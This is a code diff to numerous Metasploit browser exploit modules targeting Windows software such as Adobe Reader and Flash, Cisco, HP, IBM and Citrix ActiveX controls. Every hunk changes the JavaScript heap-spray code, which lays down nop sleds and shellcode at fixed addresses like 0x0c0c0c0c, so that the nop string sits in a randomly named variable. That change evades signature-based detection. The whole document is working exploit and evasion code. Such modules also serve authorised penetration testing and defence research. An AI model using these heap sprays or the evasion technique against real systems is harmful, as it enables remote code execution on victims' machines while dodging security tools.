diff --git a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
index 3e0b780952..1fcc352aca 100644
--- a/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
+++ b/modules/exploits/windows/browser/adobe_flash_mp4_cprt.rb
@@ -210,11 +210,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js_pivot = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
diff --git a/modules/exploits/windows/browser/adobe_flash_rtmp.rb b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
index 894453c795..ca46564714 100644
--- a/modules/exploits/windows/browser/adobe_flash_rtmp.rb
+++ b/modules/exploits/windows/browser/adobe_flash_rtmp.rb
@@ -140,11 +140,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_easy_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
@@ -168,11 +170,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
 
   def get_aligned_spray(t, js_rop, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
 
     var heap_obj = new heapLib.ie(0x20000);
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var rop_chain = unescape("#{js_rop}");
 
     while (nops.length < 0x80000) nops += nops;
diff --git a/modules/exploits/windows/browser/adobe_flash_sps.rb b/modules/exploits/windows/browser/adobe_flash_sps.rb
index 47e4357b4a..786a4a4c33 100644
--- a/modules/exploits/windows/browser/adobe_flash_sps.rb
+++ b/modules/exploits/windows/browser/adobe_flash_sps.rb
@@ -116,11 +116,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
diff --git a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
index f82559de4e..984a7b75c9 100644
--- a/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
@@ -210,6 +210,9 @@ class MetasploitModule < Msf::Exploit::Remote
       js_extract_str = "var block = shellcode.substring(0, (0x80000-6)/2);"
     end
 
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
+
     js = <<-JS
     function heap_spray(heaplib, nops, code, offset, max) {
       while (nops.length < 0x2000) nops += nops;
@@ -224,7 +227,8 @@ class MetasploitModule < Msf::Exploit::Remote
     }
 
     var heap_obj = new heapLib.ie(0x20000);
-    var nops = unescape("%u0c0c%u0c0c");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var code = unescape("#{shellcode}");
     heap_spray(heap_obj, nops, code, #{my_target['Offset1']}, #{my_target['Max1']});
     var fake_pointers = unescape("#{pivot}");
diff --git a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb
index c806c3cb97..6ceefcf211 100644
--- a/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb
+++ b/modules/exploits/windows/browser/adobe_flatedecode_predictor02.rb
@@ -88,6 +88,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Make some nops
     nops    = Rex::Text.to_unescape(make_nops(4))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Randomize variables
     rand1  = rand_text_alpha(rand(100) + 1)
@@ -95,7 +96,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     script = %Q|
 var #{rand1} = unescape("#{shellcode}");
-var #{rand2} = unescape("#{nops}");
+var #{randnop} = "#{nops}";
+var #{rand2} = unescape(#{randnop});
 while (#{rand2}.length < #{target['Size']}) #{rand2} += #{rand2};
 #{rand2} = #{rand2}.substring(0, #{target['Size']} - #{rand1}.length);
 memory = new Array();
diff --git a/modules/exploits/windows/browser/adobe_geticon.rb b/modules/exploits/windows/browser/adobe_geticon.rb
index b0c0e7dffc..9c8f8e7c70 100644
--- a/modules/exploits/windows/browser/adobe_geticon.rb
+++ b/modules/exploits/windows/browser/adobe_geticon.rb
@@ -92,13 +92,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rand10 = rand_text_alpha(rand(100) + 1)
     rand11 = rand_text_alpha(rand(100) + 1)
     rand12 = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     script = %Q|
     var #{rand1} = unescape("#{shellcode}");
     var #{rand2} ="";
-    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
+    var #{randnop} = "#{nops}";
+    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{randnop}");
     #{rand4} = #{rand2} + #{rand1};
-    #{rand5} = unescape("#{nops}");
+    #{rand5} = unescape(#{randnop});
     #{rand6} = 20;
     #{rand7} = #{rand6}+#{rand4}.length
     while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};
diff --git a/modules/exploits/windows/browser/adobe_jbig2decode.rb b/modules/exploits/windows/browser/adobe_jbig2decode.rb
index 8b26e8b882..ea67534b27 100644
--- a/modules/exploits/windows/browser/adobe_jbig2decode.rb
+++ b/modules/exploits/windows/browser/adobe_jbig2decode.rb
@@ -86,16 +86,18 @@ class MetasploitModule < Msf::Exploit::Remote
     rand14	= rand_text_alpha(rand(50) + 1)
     rand15	= rand_text_alpha(rand(50) + 1)
     rand16	= rand_text_alpha(rand(50) + 1)
+    randnop     = rand_text_alpha(rand(100) + 1)
 
     script = %Q|
     var #{rand1} = "";
     var #{rand2} = "";
     var #{rand3} = unescape("#{shellcode}");
     var #{rand4} = "";
+    var #{randnop} = "#{nops}";
 
-    for (#{rand5}=128;#{rand5}>=0;--#{rand5}) #{rand4} += unescape("#{nops}");
+    for (#{rand5}=128;#{rand5}>=0;--#{rand5}) #{rand4} += unescape(#{randnop});
     #{rand6} = #{rand4} + #{rand3};
-    #{rand7} = unescape("#{nops}");
+    #{rand7} = unescape(#{randnop});
     #{rand8} = 20;
     #{rand9} = #{rand8}+#{rand6}.length
     while (#{rand7}.length<#{rand9}) #{rand7}+=#{rand7};
diff --git a/modules/exploits/windows/browser/adobe_media_newplayer.rb b/modules/exploits/windows/browser/adobe_media_newplayer.rb
index 61ffba6cb5..12c595cb89 100644
--- a/modules/exploits/windows/browser/adobe_media_newplayer.rb
+++ b/modules/exploits/windows/browser/adobe_media_newplayer.rb
@@ -107,6 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rand3  = rand_text_alpha(rand(100) + 1)
     rand4  = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
     rand5  = rand_text_alpha(len/2).gsub(/([dhHjmMsty])/m, '\\\\' + '\1')
+    randnop = rand_text_alpha(rand(100) + 1)
 
     vtbuf = [target.ret].pack('V') * 4
     vtbuf << rand_text_alpha(len - vtbuf.length)
@@ -115,8 +116,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # The printd strings are 72 bytes (??)
     script = %Q|
+var #{randnop} = "#{nops}";
 var #{rand1} = unescape("#{shellcode}");
-var #{rand2} = unescape("#{nops}");
+var #{rand2} = unescape(#{randnop});
 var #{rand3} = unescape("#{retstring}");
 while(#{rand2}.length <= #{target['Size']}) #{rand2}+=#{rand2};
 #{rand2}=#{rand2}.substring(0,#{target['Size']} - #{rand1}.length);
diff --git a/modules/exploits/windows/browser/adobe_utilprintf.rb b/modules/exploits/windows/browser/adobe_utilprintf.rb
index 03a8c41b0d..42828894ad 100644
--- a/modules/exploits/windows/browser/adobe_utilprintf.rb
+++ b/modules/exploits/windows/browser/adobe_utilprintf.rb
@@ -73,13 +73,15 @@ class MetasploitModule < Msf::Exploit::Remote
     rand9  = rand_text_alpha(rand(100) + 1)
     rand10 = rand_text_alpha(rand(100) + 1)
     rand11 = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     script = %Q|
     var #{rand1} = unescape("#{shellcode}");
+    var #{randnop} = "#{nops}";
     var #{rand2} ="";
-    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");
+    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(#{randnop});
     #{rand4} = #{rand2} + #{rand1};
-    #{rand5} = unescape("#{nops}");
+    #{rand5} = unescape("#{randnop}");
     #{rand6} = 20;
     #{rand7} = #{rand6}+#{rand4}.length
     while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};
diff --git a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
index 525c720023..58d14ae8cc 100644
--- a/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
+++ b/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
@@ -117,13 +117,15 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie_heap_spray(p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(get_target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(get_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
 
     js = %Q|
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{get_target['Offset']});
     var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
diff --git a/modules/exploits/windows/browser/aol_ampx_convertfile.rb b/modules/exploits/windows/browser/aol_ampx_convertfile.rb
index 41de2bcd83..182f458c2e 100644
--- a/modules/exploits/windows/browser/aol_ampx_convertfile.rb
+++ b/modules/exploits/windows/browser/aol_ampx_convertfile.rb
@@ -85,6 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
     j_ret        = rand_text_alpha(rand(100) + 1)
     j_eax        = rand_text_alpha(rand(100) + 1)
     j_bof        = rand_text_alpha(rand(100) + 1)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Build out the message
     content = %Q|
@@ -92,7 +93,8 @@ class MetasploitModule < Msf::Exploit::Remote
 <OBJECT classid='clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6' id='#{ampx}'></OBJECT>
 <script language='javascript'>
   #{j_shellcode}=unescape('#{shellcode}');
-  #{j_nops}=unescape('#{nops}');
+  var #{randnop} = "#{nops}";
+  #{j_nops}=unescape(#{randnop});
   #{j_headersize}=20;
   #{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
   while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
diff --git a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
index bf43b215f2..dbce0c6a3d 100644
--- a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
@@ -191,13 +191,15 @@ class MetasploitModule < Msf::Exploit::Remote
       arch = Rex::Arch.endian(my_target.arch)
       nops = Rex::Text.to_unescape("\x0c\x0c\x0c\x0c", arch)
       code = Rex::Text.to_unescape(payload.encoded, arch)
+      randnop = rand_text_alpha(rand(100) + 1)
 
       # Spray puts payload on 0x31313131
       if my_target.name =~ /IE/
         spray = <<-JS
 var heap_obj = new heapLib.ie(0x20000);
 var code = unescape("#{code}");
-var nops = unescape("#{nops}");
+var #{randnop} = "#{nops}";
+var nops = unescape(#{randnop});
 
 while (nops.length < 0x80000) nops += nops;
 var offset = nops.substring(0, 0x800 - code.length);
@@ -223,7 +225,8 @@ for (var i=0; i < 1600; i++) {
       else
         js_spray = <<-JS
 var shellcode = unescape("#{code}");
-var bigblock = unescape("#{nops}");
+var #{randnop} = "#{nops}";
+var bigblock = unescape(#{randnop});
 var headersize = 20;
 var slackspace = headersize + shellcode.length;
 while (bigblock.length < slackspace) bigblock += bigblock;
diff --git a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
index c5766be2e3..be246f83ae 100644
--- a/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
+++ b/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb
@@ -83,11 +83,13 @@ class MetasploitModule < Msf::Exploit::Remote
     p = payload.encoded
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     nops = Rex::Text.to_unescape(make_nops(4))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{nops}");
+    var #{randnop} = "#{nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
index e971e292ec..4bd46af7ad 100644
--- a/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
+++ b/modules/exploits/windows/browser/cisco_playerpt_setsource.rb
@@ -104,11 +104,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
diff --git a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
index 7403874a11..a1972aa567 100644
--- a/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
+++ b/modules/exploits/windows/browser/cisco_playerpt_setsource_surl.rb
@@ -149,11 +149,13 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_easy_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
 
@@ -175,12 +177,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_aligned_spray(t, js_rop, js_code, js_nops, js_90_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
 
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     var nops_90 = unescape("#{js_90_nops}");
     var rop_chain = unescape("#{js_rop}");
 
diff --git a/modules/exploits/windows/browser/citrix_gateway_actx.rb b/modules/exploits/windows/browser/citrix_gateway_actx.rb
index 16fd7c4882..c1f7b8385a 100644
--- a/modules/exploits/windows/browser/citrix_gateway_actx.rb
+++ b/modules/exploits/windows/browser/citrix_gateway_actx.rb
@@ -131,12 +131,15 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # payload in JS format
     code = Rex::Text.to_unescape(payload.encoded)
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
 
     #For debugging purposes: nops.substring(0,0x534) lands the payload exactly at 0x0c0c0c0c for IE6
     spray = <<-JS
     var heap_lib = new heapLib.ie(0x20000);
     var code = unescape("#{code}");
-    var nops = unescape("%u0c0c%u0c0c");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x1000) nops += nops;
     var offset = nops.substring(0, 0x550);
diff --git a/modules/exploits/windows/browser/creative_software_cachefolder.rb b/modules/exploits/windows/browser/creative_software_cachefolder.rb
index f67dc5fa41..f8ea4e4c7e 100644
--- a/modules/exploits/windows/browser/creative_software_cachefolder.rb
+++ b/modules/exploits/windows/browser/creative_software_cachefolder.rb
@@ -70,12 +70,16 @@ class MetasploitModule < Msf::Exploit::Remote
     rand7  = rand_text_alpha(rand(100) + 1)
     rand8  = rand_text_alpha(rand(100) + 1)
 
+    randnop = rand_text_alpha(rand(100) + 1)
+    js_nops = Rex::Text.to_unescape("\x0c"*4)
+
     content = %Q|
       <html>
         <object id='#{vname}' classid='clsid:0A5FD7C5-A45C-49FC-ADB5-9952547D5715'></object>
         <script language="JavaScript">
         var #{rand1} = unescape('#{shellcode}');
-        var #{rand2} = unescape("%u0c0c%u0c0c");
+        var #{randnop} = "#{js_nops}";
+        var #{rand2} = unescape(#{randnop});
         var #{rand3} = 20;
         var #{rand4} = #{rand3} + #{rand1}.length;
         while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
diff --git a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
index 09ade0690c..013059eede 100644
--- a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
+++ b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
@@ -139,13 +139,15 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie_heap_spray(my_target, p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     # For IE 6, 7, 8
     js = %Q|
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
     var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
diff --git a/modules/exploits/windows/browser/dell_webcam_crazytalk.rb b/modules/exploits/windows/browser/dell_webcam_crazytalk.rb
index f70773b7a5..4a17a95e65 100644
--- a/modules/exploits/windows/browser/dell_webcam_crazytalk.rb
+++ b/modules/exploits/windows/browser/dell_webcam_crazytalk.rb
@@ -85,11 +85,13 @@ class MetasploitModule < Msf::Exploit::Remote
     p = payload.encoded
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
diff --git a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb
index ab90c7164f..269314598d 100644
--- a/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb
+++ b/modules/exploits/windows/browser/ebook_flipviewer_fviewerloading.rb
@@ -60,6 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
     shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
 
     nops    = Rex::Text.to_unescape(make_nops(4))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     ret     = Rex::Text.uri_encode([target.ret].pack('L'))
 
@@ -78,7 +79,8 @@ class MetasploitModule < Msf::Exploit::Remote
 <object classid='clsid:BA83FD38-CE14-4DA3-BEF5-96050D55F78A' id='#{vname}'></object>
 <script language='javascript'>
 var #{rand1} = unescape('#{shellcode}');
-var #{rand2} = unescape('#{nops}');
+var #{randnop} = "#{nops}";
+var #{rand2} = unescape(#{randnop});
 var #{rand3} = 20;
 var #{rand4} = #{rand3} + #{rand1}.length;
 while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
diff --git a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
index 19c02fd06b..6ba879e883 100644
--- a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
+++ b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
@@ -104,6 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     case my_target
@@ -133,7 +134,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       var heap_obj = new heapLib.ie(0x10000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_random_nops}");
+      var #{randnop} = "#{js_random_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset_length = #{my_target['Offset']};
       for (var i=0; i < 0x1000; i++) {
@@ -152,7 +154,8 @@ class MetasploitModule < Msf::Exploit::Remote
       js = %Q|
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
index f1f55c9940..239d43317f 100644
--- a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
+++ b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
@@ -113,6 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     case my_target
@@ -142,7 +143,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
       var heap_obj = new heapLib.ie(0x10000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_random_nops}");
+      var #{randnop} = "#{js_random_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset_length = #{my_target['Offset']};
       for (var i=0; i < 0x1000; i++) {
@@ -161,7 +163,8 @@ class MetasploitModule < Msf::Exploit::Remote
       js = %Q|
       var heap_obj = new heapLib.ie(0x20000);
       var code = unescape("#{js_code}");
-      var nops = unescape("#{js_nops}");
+      var #{randnop} = "#{js_nops}";
+      var nops = unescape(#{randnop});
       while (nops.length < 0x80000) nops += nops;
       var offset = nops.substring(0, #{my_target['Offset']});
       var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
diff --git a/modules/exploits/windows/browser/hpmqc_progcolor.rb b/modules/exploits/windows/browser/hpmqc_progcolor.rb
index 19f0929c35..642d180bfd 100644
--- a/modules/exploits/windows/browser/hpmqc_progcolor.rb
+++ b/modules/exploits/windows/browser/hpmqc_progcolor.rb
@@ -82,13 +82,15 @@ class MetasploitModule < Msf::Exploit::Remote
     j_memory     = rand_text_alpha(rand(100) + 1)
     j_counter    = rand_text_alpha(rand(30) + 2)
     j_ret        = rand_text_alpha(rand(100) + 1)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
     # Build out the message
     content = %Q|<html>
 <object classid='clsid:98C53984-8BF8-4D11-9B1C-C324FCA9CADE' id='#{mqcontrol}'></object>
 <script language='javascript'>
 #{j_shellcode} = unescape('#{shellcode}');
-#{j_nops} = unescape('#{nops}');
+#{randnop} = "#{nops}";
+#{j_nops} = unescape(#{randnop});
 #{j_headersize} = 20;
 #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
diff --git a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
index 5d962a0197..54775f7a1f 100644
--- a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
+++ b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
@@ -132,13 +132,15 @@ class MetasploitModule < Msf::Exploit::Remote
   def ie_heap_spray(my_target, p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
     js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     # Land the payload at 0x0c0c0c0c
     # For IE 6, 7, 8
     js = %Q|
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['Offset']});
     var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
diff --git a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
index 30ce1dab03..d864abd576 100644
--- a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
+++ b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
@@ -183,11 +183,13 @@ class MetasploitModule < Msf::Exploit::Remote
     p = get_payload(my_target, cli)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))
     js_nops = Rex::Text.to_unescape("\x90"*4, Rex::Arch.endian(my_target.arch))
+    randnop = rand_text_alpha(rand(100) + 1)
 
     js_spray = <<-JS
     var heap_obj = new heapLib.ie(0x20000);
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
     while (nops.length < 0x80000) nops += nops;
     var offset = nops.substring(0, #{my_target['OffsetShell']});
diff --git a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb
index 88ea81859f..ee8717b732 100644
--- a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb
+++ b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb
@@ -82,6 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
     j_counter    = rand_text_alpha(rand(30) + 2)
     j_ret        = rand_text_alpha(rand(100) + 1)
     j_junk       = rand_text_alpha(rand(100) + 1)
+    randnop      = rand_text_alpha(rand(100) + 1)
 
 
     # Build out the message
@@ -91,7 +92,8 @@ class MetasploitModule < Msf::Exploit::Remote
 <object classid='clsid:3BFFE033-BF43-11D5-A271-00A024A51325' id='#{inotes6}'></object>
 <script language='javascript'>
 #{j_shellcode} = unescape('#{shellcode}');
-#{j_nops} = unescape('#{nops}');
+#{randnop} = "#{nops}";
+#{j_nops} = unescape(#{randnop});
 #{j_headersize} = 20;
 #{j_slackspace} = #{j_headersize} + #{j_shellcode}.length
 while (#{j_nops}.length < #{j_slackspace}) #{j_nops} += #{j_nops};
diff --git a/modules/exploits/windows/browser/ie_execcommand_uaf.rb b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
index e553f97f7f..4f37694a87 100644
--- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb
+++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
@@ -164,6 +164,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Exploit writing tutorial part 11 : Heap Spraying Demystified
   # See https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
   def get_random_spray(t, js_code, js_nops)
+    randnop = rand_text_alpha(rand(100) + 1)
 
     spray = <<-JS
 
@@ -191,7 +192,8 @@ class MetasploitModule < Msf::Exploit::Remote
     var heap_obj = new heapLib.ie(0x10000);
 
     var code = unescape("#{js_code}");
-    var nops = unescape("#{js_nops}");
+    var #{randnop} = "#{js_nops}";
+    var nops = unescape(#{randnop});
 
